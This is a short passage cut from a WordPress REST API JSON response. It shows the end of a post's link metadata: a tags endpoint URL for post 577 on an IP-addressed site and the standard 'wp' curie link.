ref":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/tags?post=577"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}
